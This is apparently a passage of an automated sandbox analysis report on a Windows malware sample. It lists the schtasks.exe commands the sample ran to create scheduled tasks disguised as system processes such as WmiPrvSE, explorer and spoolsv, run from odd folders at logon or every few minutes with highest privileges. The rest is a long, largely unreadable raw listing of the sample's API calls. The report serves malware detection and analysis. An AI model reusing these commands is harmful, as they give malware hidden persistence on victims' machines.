            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:16
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:17
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:20
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:21
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:23
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:24
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:25
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:26
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:27
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:28
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:29
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:30
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 12 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:31
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:32
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:33
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:34
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:35
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:36
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:37
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:38
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:39
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:40
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:41
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true


              Execution Graph

              Execution Coverage:9.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:9.4%
              Total number of Nodes:1472
              Total number of Limit Nodes:30
              [Execution graph: in the original report this is an interactive call graph of the sample (1472 nodes, 30 limit nodes) with each node labelled by function address and the Windows API calls it makes, and edges drawn between callers and callees. The raw node and edge listing does not survive extraction as readable text and is not reproduced here.]
24270->24271 24272 b9d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24270->24272 24560 b9bc84 24271->24560 24273 b8400a _swprintf 51 API calls 24272->24273 24275 b9d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24273->24275 24571 b9aded LoadBitmapW 24275->24571 24278 b9d6a0 24565 b9d287 24278->24565 24279 b9d636 OpenFileMappingW 24282 b9d64f MapViewOfFile 24279->24282 24283 b9d696 CloseHandle 24279->24283 24285 b9d68d UnmapViewOfFile 24282->24285 24286 b9d660 __vswprintf_c_l 24282->24286 24283->24272 24285->24283 24290 b9d287 2 API calls 24286->24290 24292 b9d67c 24290->24292 24291 b98835 8 API calls 24293 b9d76a DialogBoxParamW 24291->24293 24292->24285 24294 b9d7a4 24293->24294 24295 b9d7bd 24294->24295 24296 b9d7b6 Sleep 24294->24296 24298 b9d7cb 24295->24298 24601 b9a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24295->24601 24296->24295 24299 b9d7ea DeleteObject 24298->24299 24300 b9d7ff DeleteObject 24299->24300 24301 b9d806 24299->24301 24300->24301 24302 b9d849 24301->24302 24303 b9d837 24301->24303 24598 b9a39d 24302->24598 24602 b9d2e6 6 API calls 24303->24602 24305 b9d83d CloseHandle 24305->24302 24307 b9d883 24308 ba757e GetModuleHandleW 24307->24308 24309 b9ebcf 24308->24309 24309->24228 24310 ba76a7 24309->24310 24738 ba7424 24310->24738 24313->24210 24314->24217 24315->24230 24316->24216 24317->24236 24319 ba201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24318->24319 24331 ba310e 24319->24331 24322 ba2029 24322->24238 24324 ba2031 24325 ba203c 24324->24325 24345 ba314a DeleteCriticalSection 24324->24345 24325->24238 24373 bab73a 24327->24373 24330 ba203f 8 API calls 3 library calls 24330->24243 24332 ba3117 24331->24332 24334 ba3140 24332->24334 24335 ba2025 24332->24335 24346 ba3385 24332->24346 24351 ba314a DeleteCriticalSection 24334->24351 24335->24322 24337 ba215c 24335->24337 24366 ba329a 24337->24366 24339 ba2166 24344 ba2171 24339->24344 24371 ba3348 6 API calls 
try_get_function 24339->24371 24341 ba218c 24341->24324 24342 ba217f 24342->24341 24372 ba218f 6 API calls ___vcrt_FlsFree 24342->24372 24344->24324 24345->24322 24352 ba3179 24346->24352 24349 ba33a8 24349->24332 24350 ba33bc InitializeCriticalSectionAndSpinCount 24350->24349 24351->24335 24353 ba31ad 24352->24353 24356 ba31a9 24352->24356 24353->24349 24353->24350 24354 ba31cd 24354->24353 24357 ba31d9 GetProcAddress 24354->24357 24356->24353 24356->24354 24359 ba3219 24356->24359 24358 ba31e9 __crt_fast_encode_pointer 24357->24358 24358->24353 24360 ba3241 LoadLibraryExW 24359->24360 24361 ba3236 24359->24361 24362 ba325d GetLastError 24360->24362 24364 ba3275 24360->24364 24361->24356 24363 ba3268 LoadLibraryExW 24362->24363 24362->24364 24363->24364 24364->24361 24365 ba328c FreeLibrary 24364->24365 24365->24361 24367 ba3179 try_get_function 5 API calls 24366->24367 24368 ba32b4 24367->24368 24369 ba32cc TlsAlloc 24368->24369 24370 ba32bd 24368->24370 24370->24339 24371->24342 24372->24344 24376 bab753 24373->24376 24374 b9ec4a ___delayLoadHelper2@8 5 API calls 24375 b9e5ee 24374->24375 24375->24240 24375->24330 24376->24374 24378 b9f033 GetStartupInfoW 24377->24378 24378->24255 24380 bab299 24379->24380 24382 bab2a2 24379->24382 24384 bab188 24380->24384 24382->24258 24383->24258 24385 ba8fa5 pre_c_initialization 38 API calls 24384->24385 24386 bab195 24385->24386 24404 bab2ae 24386->24404 24388 bab19d 24413 baaf1b 24388->24413 24391 bab1b4 24391->24382 24392 ba8518 __onexit 21 API calls 24393 bab1c5 24392->24393 24394 bab1f7 24393->24394 24420 bab350 24393->24420 24397 ba84de _free 20 API calls 24394->24397 24397->24391 24398 bab1f2 24430 ba895a 20 API calls __dosmaperr 24398->24430 24400 bab23b 24400->24394 24431 baadf1 26 API calls 24400->24431 24401 bab20f 24401->24400 24402 ba84de _free 20 API calls 24401->24402 24402->24400 24405 bab2ba CallCatchBlock 24404->24405 24406 ba8fa5 pre_c_initialization 38 API calls 24405->24406 24411 bab2c4 24406->24411 
24408 bab348 CallCatchBlock 24408->24388 24411->24408 24412 ba84de _free 20 API calls 24411->24412 24432 ba8566 38 API calls _abort 24411->24432 24433 baa3f1 EnterCriticalSection 24411->24433 24434 bab33f LeaveCriticalSection _abort 24411->24434 24412->24411 24414 ba3dd6 __fassign 38 API calls 24413->24414 24415 baaf2d 24414->24415 24416 baaf4e 24415->24416 24417 baaf3c GetOEMCP 24415->24417 24418 baaf65 24416->24418 24419 baaf53 GetACP 24416->24419 24417->24418 24418->24391 24418->24392 24419->24418 24421 baaf1b 40 API calls 24420->24421 24422 bab36f 24421->24422 24424 bab3c0 IsValidCodePage 24422->24424 24427 bab376 24422->24427 24428 bab3e5 ___scrt_fastfail 24422->24428 24423 b9ec4a ___delayLoadHelper2@8 5 API calls 24425 bab1ea 24423->24425 24426 bab3d2 GetCPInfo 24424->24426 24424->24427 24425->24398 24425->24401 24426->24427 24426->24428 24427->24423 24435 baaff4 GetCPInfo 24428->24435 24430->24394 24431->24394 24433->24411 24434->24411 24436 bab0d8 24435->24436 24442 bab02e 24435->24442 24439 b9ec4a ___delayLoadHelper2@8 5 API calls 24436->24439 24441 bab184 24439->24441 24441->24427 24445 bac099 24442->24445 24444 baa275 __vsnwprintf_l 43 API calls 24444->24436 24446 ba3dd6 __fassign 38 API calls 24445->24446 24447 bac0b9 MultiByteToWideChar 24446->24447 24449 bac18f 24447->24449 24450 bac0f7 24447->24450 24451 b9ec4a ___delayLoadHelper2@8 5 API calls 24449->24451 24452 ba8518 __onexit 21 API calls 24450->24452 24456 bac118 __vsnwprintf_l ___scrt_fastfail 24450->24456 24453 bab08f 24451->24453 24452->24456 24459 baa275 24453->24459 24454 bac189 24464 baa2c0 20 API calls _free 24454->24464 24456->24454 24457 bac15d MultiByteToWideChar 24456->24457 24457->24454 24458 bac179 GetStringTypeW 24457->24458 24458->24454 24460 ba3dd6 __fassign 38 API calls 24459->24460 24461 baa288 24460->24461 24465 baa058 24461->24465 24464->24449 24467 baa073 __vsnwprintf_l 24465->24467 24466 baa099 MultiByteToWideChar 24468 baa0c3 24466->24468 24469 baa24d 24466->24469 
24467->24466 24472 ba8518 __onexit 21 API calls 24468->24472 24475 baa0e4 __vsnwprintf_l 24468->24475 24470 b9ec4a ___delayLoadHelper2@8 5 API calls 24469->24470 24471 baa260 24470->24471 24471->24444 24472->24475 24473 baa12d MultiByteToWideChar 24474 baa199 24473->24474 24476 baa146 24473->24476 24501 baa2c0 20 API calls _free 24474->24501 24475->24473 24475->24474 24492 baa72c 24476->24492 24480 baa1a8 24484 ba8518 __onexit 21 API calls 24480->24484 24487 baa1c9 __vsnwprintf_l 24480->24487 24481 baa170 24481->24474 24482 baa72c __vsnwprintf_l 11 API calls 24481->24482 24482->24474 24483 baa23e 24500 baa2c0 20 API calls _free 24483->24500 24484->24487 24485 baa72c __vsnwprintf_l 11 API calls 24488 baa21d 24485->24488 24487->24483 24487->24485 24488->24483 24489 baa22c WideCharToMultiByte 24488->24489 24489->24483 24490 baa26c 24489->24490 24502 baa2c0 20 API calls _free 24490->24502 24493 baa458 __dosmaperr 5 API calls 24492->24493 24494 baa753 24493->24494 24497 baa75c 24494->24497 24503 baa7b4 10 API calls 3 library calls 24494->24503 24496 baa79c LCMapStringW 24496->24497 24498 b9ec4a ___delayLoadHelper2@8 5 API calls 24497->24498 24499 baa15d 24498->24499 24499->24474 24499->24480 24499->24481 24500->24474 24501->24469 24502->24474 24503->24496 24505 b9e360 24504->24505 24506 b900d9 GetModuleHandleW 24505->24506 24507 b900f0 GetProcAddress 24506->24507 24508 b90154 24506->24508 24510 b90109 24507->24510 24511 b90121 GetProcAddress 24507->24511 24509 b90484 GetModuleFileNameW 24508->24509 24612 ba70dd 42 API calls 2 library calls 24508->24612 24524 b904a3 24509->24524 24510->24511 24511->24508 24517 b90133 24511->24517 24513 b903be 24513->24509 24514 b903c9 GetModuleFileNameW CreateFileW 24513->24514 24515 b90478 CloseHandle 24514->24515 24516 b903fc SetFilePointer 24514->24516 24515->24509 24516->24515 24518 b9040c ReadFile 24516->24518 24517->24508 24518->24515 24521 b9042b 24518->24521 24521->24515 24523 b90085 2 API calls 24521->24523 24522 b904d2 
CompareStringW 24522->24524 24523->24521 24524->24522 24525 b90508 GetFileAttributesW 24524->24525 24526 b90520 24524->24526 24603 b8acf5 24524->24603 24606 b90085 24524->24606 24525->24524 24525->24526 24527 b9052a 24526->24527 24530 b90560 24526->24530 24529 b90542 GetFileAttributesW 24527->24529 24531 b9055a 24527->24531 24528 b9066f 24552 b99da4 GetCurrentDirectoryW 24528->24552 24529->24527 24529->24531 24530->24528 24532 b8acf5 GetVersionExW 24530->24532 24531->24530 24533 b9057a 24532->24533 24534 b90581 24533->24534 24535 b905e7 24533->24535 24537 b90085 2 API calls 24534->24537 24536 b8400a _swprintf 51 API calls 24535->24536 24538 b9060f AllocConsole 24536->24538 24539 b9058b 24537->24539 24540 b9061c GetCurrentProcessId AttachConsole 24538->24540 24541 b90667 ExitProcess 24538->24541 24542 b90085 2 API calls 24539->24542 24613 ba35b3 24540->24613 24544 b90595 24542->24544 24546 b8ddd1 53 API calls 24544->24546 24547 b905b0 24546->24547 24548 b8400a _swprintf 51 API calls 24547->24548 24549 b905c3 24548->24549 24550 b8ddd1 53 API calls 24549->24550 24551 b905d2 24550->24551 24551->24541 24552->24265 24554 b90085 2 API calls 24553->24554 24555 b9a349 OleInitialize 24554->24555 24556 b9a36c GdiplusStartup SHGetMalloc 24555->24556 24556->24267 24558 b913d7 IsDBCSLeadByte 24557->24558 24558->24558 24559 b913ef 24558->24559 24559->24269 24561 b9bc8e 24560->24561 24562 b9179d CharUpperW 24561->24562 24563 b9bda4 24561->24563 24615 b8ecad 80 API calls ___scrt_fastfail 24561->24615 24562->24561 24563->24278 24563->24279 24566 b9e360 24565->24566 24567 b9d294 SetEnvironmentVariableW 24566->24567 24569 b9d2b7 24567->24569 24568 b9d2df 24568->24272 24569->24568 24570 b9d2d3 SetEnvironmentVariableW 24569->24570 24570->24568 24572 b9ae0e 24571->24572 24573 b9ae15 24571->24573 24616 b99e1c FindResourceW 24572->24616 24575 b9ae1b GetObjectW 24573->24575 24576 b9ae2a 24573->24576 24575->24576 24577 b99d1a 4 API calls 24576->24577 24578 b9ae3d 24577->24578 24579 b9ae80 
24578->24579 24580 b9ae5c 24578->24580 24582 b99e1c 13 API calls 24578->24582 24590 b8d31c 24579->24590 24632 b99d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24580->24632 24584 b9ae4d 24582->24584 24583 b9ae64 24633 b99d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24583->24633 24584->24580 24586 b9ae53 DeleteObject 24584->24586 24586->24580 24587 b9ae6d 24634 b99f5d 8 API calls ___scrt_fastfail 24587->24634 24589 b9ae74 DeleteObject 24589->24579 24643 b8d341 24590->24643 24592 b8d328 24683 b8da4e GetModuleHandleW FindResourceW 24592->24683 24595 b98835 24596 b9e24a new 8 API calls 24595->24596 24597 b98854 24596->24597 24597->24291 24599 b9a3cc GdiplusShutdown CoUninitialize 24598->24599 24599->24307 24601->24298 24602->24305 24604 b8ad09 GetVersionExW 24603->24604 24605 b8ad45 24603->24605 24604->24605 24605->24524 24607 b9e360 24606->24607 24608 b90092 GetSystemDirectoryW 24607->24608 24609 b900c8 24608->24609 24610 b900aa 24608->24610 24609->24524 24611 b900bb LoadLibraryW 24610->24611 24611->24609 24612->24513 24614 b9063d GetStdHandle WriteConsoleW Sleep FreeConsole 24613->24614 24614->24541 24615->24561 24617 b99e70 24616->24617 24618 b99e3e SizeofResource 24616->24618 24617->24573 24618->24617 24619 b99e52 LoadResource 24618->24619 24619->24617 24620 b99e63 LockResource 24619->24620 24620->24617 24621 b99e77 GlobalAlloc 24620->24621 24621->24617 24622 b99e92 GlobalLock 24621->24622 24623 b99f21 GlobalFree 24622->24623 24624 b99ea1 __vswprintf_c_l 24622->24624 24623->24617 24625 b99ea9 CreateStreamOnHGlobal 24624->24625 24626 b99f1a GlobalUnlock 24625->24626 24627 b99ec1 24625->24627 24626->24623 24635 b99d7b GdipAlloc 24627->24635 24630 b99f05 24630->24626 24631 b99eef GdipCreateHBITMAPFromBitmap 24631->24630 24632->24583 24633->24587 24634->24589 24636 b99d8d 24635->24636 24637 b99d9a 24635->24637 24639 b99b0f 24636->24639 24637->24626 24637->24630 24637->24631 24640 b99b30 GdipCreateBitmapFromStreamICM 24639->24640 24641 b99b37 
GdipCreateBitmapFromStream 24639->24641 24642 b99b3c 24640->24642 24641->24642 24642->24637 24644 b8d34b _wcschr __EH_prolog 24643->24644 24645 b8d37a GetModuleFileNameW 24644->24645 24646 b8d3ab 24644->24646 24647 b8d394 24645->24647 24685 b899b0 24646->24685 24647->24646 24649 b8d407 24696 ba5a90 26 API calls 3 library calls 24649->24696 24650 b89653 79 API calls 24651 b8d7ab 24650->24651 24651->24592 24652 b93781 76 API calls 24654 b8d3db 24652->24654 24654->24649 24654->24652 24667 b8d627 24654->24667 24655 b8d41a 24697 ba5a90 26 API calls 3 library calls 24655->24697 24657 b8d563 24657->24667 24715 b89d30 77 API calls 24657->24715 24661 b8d57d new 24662 b89bf0 80 API calls 24661->24662 24661->24667 24665 b8d5a6 new 24662->24665 24664 b8d42c 24664->24657 24664->24667 24698 b89e40 24664->24698 24706 b89bf0 24664->24706 24714 b89d30 77 API calls 24664->24714 24665->24667 24680 b8d5b2 new 24665->24680 24716 b9137a MultiByteToWideChar 24665->24716 24667->24650 24668 b8d72b 24717 b8ce72 76 API calls 24668->24717 24670 b8da0a 24722 b8ce72 76 API calls 24670->24722 24672 b8d9fa 24672->24592 24673 b8d771 24718 ba5a90 26 API calls 3 library calls 24673->24718 24675 b8d742 24675->24673 24677 b93781 76 API calls 24675->24677 24676 b8d78b 24719 ba5a90 26 API calls 3 library calls 24676->24719 24677->24675 24679 b91596 WideCharToMultiByte 24679->24680 24680->24667 24680->24668 24680->24670 24680->24672 24680->24679 24720 b8dd6b 50 API calls __vsnprintf 24680->24720 24721 ba58d9 26 API calls 3 library calls 24680->24721 24684 b8d32f 24683->24684 24684->24595 24686 b899ba 24685->24686 24687 b89a39 CreateFileW 24686->24687 24688 b89a59 GetLastError 24687->24688 24690 b89aaa 24687->24690 24691 b8b66c 2 API calls 24688->24691 24689 b89ae1 24689->24654 24690->24689 24692 b89ac7 SetFileTime 24690->24692 24693 b89a79 24691->24693 24692->24689 24693->24690 24694 b89a7d CreateFileW GetLastError 24693->24694 24695 b89aa1 24694->24695 24695->24690 24696->24655 24697->24664 24699 b89e64 
SetFilePointer 24698->24699 24700 b89e53 24698->24700 24701 b89e9d 24699->24701 24702 b89e82 GetLastError 24699->24702 24700->24701 24723 b86fa5 75 API calls 24700->24723 24701->24664 24702->24701 24704 b89e8c 24702->24704 24704->24701 24724 b86fa5 75 API calls 24704->24724 24708 b89bfc 24706->24708 24712 b89c03 24706->24712 24708->24664 24709 b89cc0 24709->24708 24713 b8984e 5 API calls 24709->24713 24710 b89c9e 24710->24708 24737 b86f6b 75 API calls 24710->24737 24712->24708 24712->24709 24712->24710 24725 b8984e 24712->24725 24713->24709 24714->24664 24715->24661 24716->24680 24717->24675 24718->24676 24719->24667 24720->24680 24721->24680 24722->24672 24723->24699 24724->24701 24726 b8985c GetStdHandle 24725->24726 24727 b89867 ReadFile 24725->24727 24726->24727 24728 b89880 24727->24728 24732 b898a0 24727->24732 24729 b89989 GetFileType 24728->24729 24730 b89887 24729->24730 24731 b898a8 GetLastError 24730->24731 24733 b898b7 24730->24733 24736 b89895 24730->24736 24731->24732 24731->24733 24732->24712 24733->24732 24735 b898c7 GetLastError 24733->24735 24734 b8984e GetFileType 24734->24732 24735->24732 24735->24736 24736->24734 24737->24708 24739 ba7430 _abort 24738->24739 24740 ba7448 24739->24740 24741 ba757e _abort GetModuleHandleW 24739->24741 24760 baa3f1 EnterCriticalSection 24740->24760 24743 ba743c 24741->24743 24743->24740 24772 ba75c2 GetModuleHandleExW 24743->24772 24747 ba750b 24764 ba753d 